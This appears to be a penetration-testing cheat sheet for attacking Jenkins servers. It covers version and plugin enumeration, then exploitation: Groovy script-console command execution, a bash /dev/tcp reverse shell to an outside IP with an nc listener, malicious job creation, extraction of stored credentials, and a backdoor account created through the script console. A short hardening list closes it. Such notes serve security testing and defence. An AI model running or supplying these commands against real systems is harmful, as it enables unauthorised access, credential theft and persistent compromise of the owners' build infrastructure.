# abuse ### 1. Jenkins Version Detection * **HTTP Headers:** ```bash curl -I http://target:8080/ ``` * **Nmap Version Detection:** ```bash nmap -sV -p 8080 ``` * **Jenkins CLI Detection:** ```bash curl http://target:8080/jenkins/cli/ | grep -i "Jenkins CLI" ``` *** ### 2. Jenkins Port Enumeration * **Default HTTP:** 8080 * **Slave Communication:** 5000 ```bash nmap -sV -p 8080,5000 ``` *** ### 3. Jenkins CLI Enumeration * **Help:** ```bash java -jar jenkins-cli.jar -s http://target:8080/jenkins/ help ``` * **List Plugins:** ```bash java -jar jenkins-cli.jar -s http://target:8080/jenkins/ list-plugins ``` * **List Jobs:** ```bash java -jar jenkins-cli.jar -s http://target:8080/jenkins/ list-jobs ``` * Enumerate jobs, plugins, users. *** ### 4. Jenkins Plugin Enumeration * **List Installed Plugins:** ```bash curl http://target:8080/jenkins/pluginManager/ ``` * Common vulnerability source. * **Vulnerability Search:** Inspect plugin names, search for CVEs on NVD/Exploit-DB. * **Example:** Pipeline: Groovy plugin (CVE-2019-10352) allows arbitrary code execution. * **Exploitation Methods:** Research specific plugin CVEs and exploitation methods. *** ### 5. Jenkins Security Realm Enumeration * **Check Authentication Methods:** ```bash curl http://target:8080/jenkins/configureSecurity/ ``` * Jenkins DB, LDAP, etc. *** ### 6. Jenkins API Enumeration * **API Endpoints:** ```bash curl http://target:8080/jenkins/api/ curl http://target:8080/jenkins/api/json ``` * **API Token Enumeration:** * Check for exposed tokens in API responses or configuration files. * Use API tokens for unauthorized access. * Enumerate API endpoints for sensitive data using tools like curl or python's request library. * **API Endpoint Vulnerabilities:** * Test API endpoints for vulnerabilities (fuzzing, parameter manipulation). * Check for endpoints allowing command injection or file read. *** ### 7. Jenkins Access Control Enumeration * **Access Control Settings:** ```bash curl http://target:8080/jenkins/configureSecurity/ ``` *** ### 8. Exploiting Jenkins Script Console * **Remote Command Execution:** ```bash curl -X POST -u admin:password --data-urlencode "script=println('Exploit successful')" http://target:8080/jenkins/scriptText ``` * **Groovy Command Execution (Linux):** ```bash curl -X POST -d "script=println 'id'.execute()" http://target:8080/jenkins/scriptText ``` * **Groovy Command Execution (Windows):** ```bash curl -X POST -d "script=def cmd = 'cmd.exe /c dir'.execute(); println cmd.text" http://target:8080/jenkins/scriptText ``` * **Reverse Shell via Groovy (Linux):** ```bash curl -X POST -d "script=r = Runtime.getRuntime(); p = r.exec(['/bin/bash','-c','exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do $line 2>&5 >&5; done'] as String[]); p.waitFor()" http://target:8080/jenkins/scriptText nc -lvnp 8443 ``` *** ### 9. Exploiting Build Job Misconfigurations * **Create Malicious Job:** ```bash java -jar jenkins-cli.jar -s http://target:8080/jenkins/ create-job exploit_job < exploit.xml ``` *** ### 10. Exploiting Pipeline Misconfigurations * **Inject Malicious Groovy Script:** ```bash java -jar jenkins-cli.jar -s http://target:8080/jenkins/ build exploit_pipeline ``` *** ### 11. Extracting Credentials from Jenkins * **Extract Stored Credentials:** ```bash curl -u admin:password http://target:8080/jenkins/credentials/store/system/domain/_/ ``` *** ### 12. Persistence and Post-Exploitation * **Create Backdoor User:** ```bash curl -X POST -u admin:password --data-urlencode "script=jenkins.model.Jenkins.instance.securityRealm.createAccount('attacker', 'password')" http://target:8080/jenkins/scriptText ``` *** ### 13. Unauthenticated Exploits (Public Jenkins) * **Check for Anonymous Access:** ```bash curl http://target:8080/jenkins/ ``` *** ### 14. Pipeline Script Injection (Groovy RCE) ```groovy def cmd = "whoami".execute() println cmd.text ``` *** ### 15. Jenkins Slave Exploitation * **Misconfigured Slave Nodes:** * Check for misconfigured slave nodes. * Insecure communication protocols, lack of access control. * Exploit misconfigured slaves to gain access to the Jenkins master. *** ### 16. Exploiting Misconfigured Webhooks * **Webhook-Triggered Jobs:** * Identify webhook-triggered jobs. *** ### 17. Jenkins SSRF & External Service Interaction ```groovy def url = "http://internal-service.local:8080" def conn = url.toURL().openConnection() println conn.getInputStream().text ``` *** ### 18. Jenkins Reverse Shell via Build Step Manipulation * **Modify Job Build Steps:** * Modify job build steps for reverse shell. *** ### 19. Privilege Escalation via Misconfigured Agents * **Elevated Privileges:** * If Jenkins agents run with elevated privileges, execute commands as a higher-privileged user. *** ### 20. Arbitrary File Read via Plugin Vulnerabilities * **Vulnerable Plugins:** * Exploit vulnerable plugins like "Pipeline: Groovy" to read sensitive files. *** ### Additional Exploitation Techniques * **21. CSRF Protection Bypass:** * Jenkins has CSRF protection, but misconfigurations may allow bypassing. * Common bypass methods: Referer header manipulation, token manipulation. * **22. Authentication Bypass Details:** * Expand on authentication bypass vulnerabilities and exploits. * Check for anonymous access misconfigurations. * Path traversal, header manipulation, session hijacking, default credentials. * **23. Jenkins Security Hardening:** * Keep Jenkins and plugins updated. * Restrict access to the script console. * Use strong authentication and RBAC. * Strong passwords, MFA, network segmentation, regular security audits, principle of least privilege.